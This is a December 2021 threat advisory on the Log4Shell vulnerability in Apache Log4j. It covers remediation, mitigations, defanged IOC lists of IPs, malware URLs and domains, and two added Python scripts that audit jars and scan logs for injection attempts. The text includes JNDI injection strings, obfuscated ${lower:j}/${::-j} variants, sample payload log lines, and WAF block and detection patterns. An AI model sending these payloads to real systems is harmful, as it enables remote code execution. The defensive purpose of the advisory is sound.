URL: https://niiconsulting.com/checkmate/2021/12/zero-day-vulnerability-aka-log4shell-in-apache-log4j-is-being-actively-exploited/
Submission: On December 14 via api from US — Scanned from DE
ZERO-DAY VULNERABILITY (AKA LOG4SHELL) IN APACHE LOG4J IS BEING ACTIVELY EXPLOITED
December 13, 2021 | Nandeesha B | Threat Advisory

INTRODUCTION

The Log4Shell vulnerability (CVE-2021-44228) affects multiple versions of Apache Log4j 2, a Java logging component embedded in a very large number of applications and appliances. The flaw lies in the way Log4j's lookup feature resolves variables in logged data: when a logged string contains a Java Naming and Directory Interface (JNDI) lookup such as ${jndi:ldap://attacker-host/a}, Log4j 2 versions below 2.15.0 resolve it by contacting the named server (jndi:ldap, jndi:rmi and other JNDI providers), and the server's response can direct the JVM to load and run attacker-supplied Java classes. The attacker only needs to get the string logged, for example by sending it in an HTTP header such as User-Agent, in a form field, or in any other input the application writes to its logs, so a remote, unauthenticated attacker can execute arbitrary code on the target system. Successful exploitation may result in complete compromise of the vulnerable host. Threat actors have already begun actively exploiting this vulnerability in the wild.

VULNERABLE PRODUCT

All versions of Apache Log4j 2 from 2.0-beta9 up to and including 2.14.1. The Log4j 1.x branch does not contain this lookup feature and is not affected by CVE-2021-44228.

BUSINESS IMPACT

Successful exploitation allows a remote, unauthenticated attacker to execute arbitrary code, take complete control of unpatched systems and deploy further malicious payloads, including ransomware and similar disruptive attacks.

REMEDIATION

1. Patch Log4j 2 to 2.15.0 or later. 2.15.0 was the first fixed release available when this advisory was written and turns message lookups off by default; use the latest 2.x release your platform supports.
2. For systems that cannot be updated (or not updated immediately), apply the Logout4Shell "vaccine", which uses the vulnerability itself to switch the lookup off in the running JVM. Treat it as a stopgap: the change does not survive a restart, so patch as soon as possible.
3. Use the published search commands and YARA rules to hunt for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228 in your logs and on your hosts.
4. Test your applications for the Log4Shell vulnerability.

MITIGATIONS

1. In releases >= 2.10, set the system property log4j2.formatMsgNoLookups to true (for example -Dlog4j2.formatMsgNoLookups=true on the java command line) or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true, then restart the application. Note: the Apache project later found this setting incomplete (CVE-2021-45046), because lookups in some non-default logging configurations still run; removing the JndiLookup class or upgrading is the safer choice.
2. For releases from 2.0-beta9 to 2.10.0 (the command works on any 2.x jar), remove the JndiLookup class from the classpath:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Repeat this for every copy of log4j-core, including copies bundled inside WAR, EAR and fat JAR files, and restart the application afterwards.

NOTE: If the server runs a Java runtime >= 8u121, the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase default to false (and from 8u191 com.sun.jndi.ldap.object.trustURLCodebase does too), so the JVM will not load classes from a remote codebase named in the naming response. This lowers the risk but does not remove it: the attacker can instead return a serialized Java object in the LDAP response and rely on deserialization gadgets already present on the application's classpath, and the lookup itself still leaks data (for example a hostname built from ${env:...}) to the attacker's server.

3. Put a WAF or proxy in front of the vulnerable Java application and block requests containing "jndi:ldap", "jndi:ldaps", "jndi:rmi" or "jndi:dns" in any request field, including the User-Agent header. Treat this as defence in depth only: Log4j evaluates nested lookups, so variants such as ${${lower:j}ndi:...} or ${::-j}ndi:... pass a literal string match.

DETECTION

1. Search logs for JNDI lookup strings: jndi:ldap, jndi:ldaps, jndi:dns, jndi:rmi (see the "Log4j RCE CVE-2021-44228 Exploitation Detection" gist on GitHub). Include the obfuscated forms noted above in the search.
2. Logs can be scanned with Neo23x0/log4shell-detector on GitHub, which handles the common obfuscation patterns.

HASH (SHA-256)

IPs
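Remediation step 4 and mitigation 2 both depend on finding every copy of log4j-core on a host, including copies buried inside WAR, EAR or fat JAR files, and knowing whether the JndiLookup class the zip -q -d command removes is still there. The following is an added example written for this page; it is not NII's tooling and not part of the Log4j project. It assumes the archives are ordinary ZIP containers and that log4j-core carries Maven's META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties (real releases do). The jars built by demo() are constructed stand-ins, not real Log4j binaries, and the affected range is the one this advisory gives (2.0-beta9 through 2.14.1).

```python
"""Audit archives for Log4j 2 core builds in the affected range and for the
JndiLookup class. Added example (not NII's or Apache's code)."""
import io
import os
import re
import shutil
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(\w+))?$")


def version_in_affected_range(version):
    """True for 2.0-beta9 <= version <= 2.14.1 (the advisory's range)."""
    m = _VERSION_RE.match(version)
    if not m or int(m.group(1)) != 2:
        return False
    minor, patch = int(m.group(2)), int(m.group(3) or 0)
    qual = (m.group(4) or "").lower()
    if (minor, patch) == (0, 0) and qual:            # 2.0-betaN / 2.0-rcN pre-releases
        q = re.match(r"(beta|rc)(\d+)$", qual)
        return bool(q) and (q.group(1) == "rc" or int(q.group(2)) >= 9)
    return (minor, patch) <= (14, 1)


def classify(version, jndi_present):
    if version == "unknown":
        return "review (version unknown)" if jndi_present else "mitigated (JndiLookup removed)"
    if not version_in_affected_range(version):
        return "not in affected range"
    return "vulnerable" if jndi_present else "mitigated (JndiLookup removed)"


def scan_archive(data, path, findings):
    """Inspect one archive held in memory; recurse into archives nested in it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = "unknown"
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            findings.append({"path": path, "version": version,
                             "jndi_lookup_present": JNDI_CLASS in names,
                             "status": classify(version, JNDI_CLASS in names)})
        for name in names:                           # e.g. app.war!WEB-INF/lib/log4j-core.jar
            if name.lower().endswith(ARCHIVE_EXT):
                scan_archive(zf.read(name), path + "!" + name, findings)


def audit_tree(root):
    """Walk a directory and return one finding per log4j-core copy found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def build_sample_jar(path, version, include_jndi_class, nested_as=None):
    """Write a constructed stand-in for log4j-core (test data, not real Log4j)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    data = buf.getvalue()
    if nested_as:                                        # wrap it inside a WAR
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as war:
            war.writestr(nested_as, data)
        data = outer.getvalue()
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Audit four constructed archives; returns {path relative to root: status}."""
    root = tempfile.mkdtemp(prefix="log4j-audit-")
    try:
        build_sample_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1", True)
        build_sample_jar(os.path.join(root, "log4j-core-2.10.0.jar"), "2.10.0", False)
        build_sample_jar(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0", True)
        build_sample_jar(os.path.join(root, "app.war"), "2.13.3", True,
                         nested_as="WEB-INF/lib/log4j-core-2.13.3.jar")
        return {f["path"][len(root) + 1:]: f["status"] for f in audit_tree(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                # python audit.py /opt/apps
        for f in audit_tree(sys.argv[1]):
            print(f"{f['status']:<32} {f['version']:<10} {f['path']}")
    else:                                # no argument: run on the constructed samples
        for p, s in sorted(demo().items()):
            print(f"{s:<32} {p}")
```

A jar whose version is outside the range but still contains JndiLookup.class is reported as "not in affected range"; a copy with no pom.properties is reported for manual review rather than silently skipped, since vendor-repackaged builds often drop the Maven metadata.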
109[.]237[.]96[.]124
62[.]102[.]148[.]69
185[.]220[.]100[.]244
185[.]220[.]101[.]142
193[.]189[.]100[.]203
147[.]182[.]169[.]254
185[.]100[.]87[.]202
72[.]223[.]168[.]73
185[.]220[.]100[.]245
185[.]220[.]101[.]143
193[.]218[.]118[.]231
147[.]182[.]219[.]9
213[.]164[.]204[.]146
81[.]17[.]18[.]60
185[.]220[.]100[.]246
185[.]220[.]101[.]145
194[.]48[.]199[.]78
151[.]115[.]60[.]113
185[.]220[.]101[.]146
104[.]244[.]72[.]115
185[.]220[.]100[.]247
185[.]220[.]101[.]147
195[.]176[.]3[.]24
159[.]65[.]58[.]66
171[.]25[.]193[.]20
104[.]244[.]74[.]57
185[.]220[.]100[.]248
185[.]220[.]101[.]148
195[.]254[.]135[.]76
159[.]65[.]155[.]208
178[.]17[.]171[.]102
104[.]244[.]74[.]211
185[.]220[.]100[.]249
185[.]220[.]101[.]149
198[.]98[.]51[.]189
164[.]90[.]199[.]216
45[.]155[.]205[.]233
104[.]244[.]76[.]170
185[.]220[.]100[.]252
185[.]220[.]101[.]153
199[.]195[.]250[.]77
167[.]99[.]164[.]201
171[.]25[.]193[.]25
107[.]189[.]1[.]160
185[.]220[.]100[.]253
185[.]220[.]101[.]156
204[.]8[.]156[.]142
167[.]99[.]172[.]58
171[.]25[.]193[.]77
107[.]189[.]1[.]178
185[.]220[.]100[.]254
185[.]220[.]101[.]157
205[.]185[.]117[.]149
167[.]99[.]172[.]213
171[.]25[.]193[.]78
107[.]189[.]12[.]135
185[.]220[.]100[.]255
185[.]220[.]101[.]158
209[.]127[.]17[.]242
185[.]220[.]100[.]241
185[.]220[.]100[.]242
107[.]189[.]14[.]98
185[.]220[.]101[.]33
185[.]220[.]101[.]161
209[.]141[.]41[.]103
185[.]220[.]101[.]37
185[.]220[.]101[.]39
122[.]161[.]50[.]23
185[.]220[.]101[.]34
185[.]220[.]101[.]163
45[.]153[.]160[.]131
185[.]220[.]101[.]41
18[.]27[.]197[.]252
171[.]25[.]193[.]20
185[.]220[.]101[.]35
185[.]220[.]101[.]168
45[.]153[.]160[.]138
185[.]220[.]101[.]57
89[.]234[.]182[.]139
171[.]25[.]193[.]25
185[.]220[.]101[.]36
185[.]220[.]101[.]169
62[.]76[.]41[.]46
185[.]220[.]101[.]134
104[.]244[.]79[.]6
171[.]25[.]193[.]77
185[.]220[.]101[.]42
185[.]220[.]101[.]172
68[.]183[.]44[.]143
185[.]220[.]101[.]144
18[.]27[.]197[.]252
171[.]25[.]193[.]78
185[.]220[.]101[.]43
185[.]220[.]101[.]175
68[.]183[.]198[.]247
185[.]220[.]101[.]154
23[.]129[.]64[.]131
178[.]62[.]79[.]49
185[.]220[.]101[.]45
185[.]220[.]101[.]177
88[.]80[.]20[.]86
185[.]220[.]101[.]160
23[.]129[.]64[.]141
181[.]214[.]39[.]2
185[.]220[.]101[.]46
185[.]220[.]101[.]179
109[.]70[.]100[.]34
185[.]220[.]101[.]171
23[.]129[.]64[.]146
185[.]38[.]175[.]132
185[.]220[.]101[.]49
185[.]220[.]101[.]180
109[.]237[.]96[.]124
185[.]220[.]101[.]186
23[.]129[.]64[.]148
185[.]83[.]214[.]69
185[.]220[.]101[.]54
185[.]220[.]101[.]181
116[.]24[.]67[.]213
185[.]220[.]102[.]249
45[.]12[.]134[.]108
185[.]100[.]87[.]41
185[.]220[.]101[.]55
185[.]220[.]101[.]182
134[.]122[.]34[.]28
188[.]166[.]48[.]55
45[.]155[.]205[.]233
185[.]100[.]87[.]202
185[.]220[.]101[.]56
185[.]220[.]101[.]185
137[.]184[.]102[.]82
188[.]166[.]92[.]228
46[.]166[.]139[.]111
185[.]107[.]47[.]171
185[.]220[.]101[.]61
185[.]220[.]101[.]189
137[.]184[.]106[.]119
188[.]166[.]122[.]43
46[.]182[.]21[.]248
185[.]129[.]61[.]1
185[.]220[.]101[.]129
185[.]220[.]101[.]191
142[.]93[.]34[.]250
193[.]189[.]100[.]195
51[.]15[.]43[.]205
185[.]220[.]100[.]240
185[.]220[.]101[.]138
185[.]220[.]102[.]8
143[.]198[.]32[.]72
193[.]218[.]118[.]183
51[.]255[.]106[.]85
185[.]220[.]100[.]242
185[.]220[.]101[.]139
185[.]220[.]102[.]242
143[.]198[.]45[.]117
195[.]19[.]192[.]26
54[.]173[.]99[.]121
185[.]220[.]100[.]243
185[.]220[.]101[.]141
193[.]31[.]24[.]154
147[.]182[.]167[.]165
212[.]193[.]57[.]225

URLs

http[:]//62.210.130.250/lh.sh
http[:]//18.228.7.109/.log/pty4
http[:]//62.210.130.250[:]80/web/admin/x86_64
http[:]//18.228.7.109/.log/pty5
http[:]//62.210.130.250[:]80/web/admin/x86
http[:]//210.141.105.67[:]80/wpcontent/themes/twentythirteen/m8
http[:]//62.210.130.250[:]80/web/admin/x86_g
http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
http[:]//45.130.229.168[:]9999/Exploit.class
hxxp[:]//45.137.155[.]55/ex[.]sh
http[:]//18.228.7.109/.log/log
hxxp[:]//45.137.155[.]55/kinsing
http[:]//18.228.7.109/.log/pty1
hxxp[:]//80.71.158[.]12/libsystem.so
http[:]//18.228.7.109/.log/pty2
hxxp[:]//80.71.158[.]12/kinsing
http[:]//18.228.7.109/.log/pty3
hxxp[:]//80.71.158[.]12/Exploit69ogQNSQYz.class

DOMAINS

nazi[.]uy
log[.]exposedbotnets[.]ru

REFERENCES
• New zero-day exploit for Log4j Java library is an enterprise nightmare
• Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack
• Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
• Log4Shell Explained
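The DETECTION section above says to search logs for jndi:ldap and friends, and the WAF mitigation blocks the same literal strings. The following added example (written for this page; it is not NII's code and not the Neo23x0 detector it mentions) shows why a literal match is not enough and what to do instead: Log4j evaluates nested lookups, so attackers write ${${lower:j}ndi:...}, spell the word out with ${::-j} default-value tricks, or URL-encode the whole payload, and none of those contain the text "jndi:ldap". normalise() folds such forms back to what Log4j would have evaluated before matching, and each line's source address is checked against the advisory's IP list. The log lines are constructed, not real captures, with RFC 5737 addresses for the non-IOC hosts; IOC_IPS holds a few entries from the list above in its defanged notation.

```python
"""Scan web-server log lines for Log4Shell lookup attempts and advisory IOC IPs.
Added example (not NII's code and not Neo23x0/log4shell-detector)."""
import re
import urllib.parse

# JNDI providers seen in exploitation; the advisory names ldap, ldaps, rmi and dns.
JNDI_RE = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)", re.I)
# An innermost ${...} lookup: one with no further '${' inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def refang(ioc):
    """'185[.]220[.]101[.]142' -> '185.220.101.142' (the advisory's list notation)."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


# A few addresses from the advisory's IP list (constructed subset for the demo).
IOC_IPS = {refang(x) for x in ("185[.]220[.]101[.]142", "45[.]155[.]205[.]233",
                                "147[.]182[.]169[.]254")}


def _resolve_inner(body):
    """Evaluate one innermost lookup the way Log4j would for the forms attackers
    rely on; lookups we cannot resolve offline keep 'kind:arg' so the prefix survives."""
    if ":-" in body:                       # ${x:-default}: a failed lookup yields the default
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if not sep:
        return body
    kind = kind.lower()
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    return kind + ":" + arg                # jndi:, env:, sys:, date: ... left as-is


def normalise(text):
    """URL-decode (repeatedly) and collapse nested lookups from the inside out."""
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(64):                    # each pass replaces every innermost ${...}
        collapsed = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def analyse_line(line):
    """Combined-log-format line -> verdict dict."""
    src = line.split(" ", 1)[0]
    hit = JNDI_RE.search(normalise(line))
    return {
        "src": src,
        "jndi": hit.group(1).lower() if hit else None,     # provider, e.g. 'ldap'
        "naive_match": "jndi:ldap" in line.lower(),        # what a literal WAF rule sees
        "ioc_ip": src in IOC_IPS,
    }


def scan_log(text):
    return [analyse_line(l) for l in text.splitlines() if l.strip()]


# Constructed sample traffic, not real captures.
SAMPLE_LOG = """\
45.155.205.233 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://45.155.205.233:12344/a}"
203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET /login?user=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:14:02:20 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.invalid/x}"
185.220.101.142 - - [10/Dec/2021:14:02:30 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "curl/7.68.0"
192.0.2.50 - - [10/Dec/2021:14:02:40 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        if r["jndi"] or r["ioc_ip"]:
            print(f"{r['src']:<16} jndi={r['jndi']!s:<5} naive={r['naive_match']!s:<5} ioc_ip={r['ioc_ip']}")
```

On the sample, the literal "jndi:ldap" check flags only the first line, while normalisation also catches the URL-encoded and ${::-j} variants; the fourth line carries no payload but comes from a listed address, which is worth a look on its own. Run it over real access, application and proxy logs rather than only the web tier, since anything that ends up in a Log4j call is a candidate injection point.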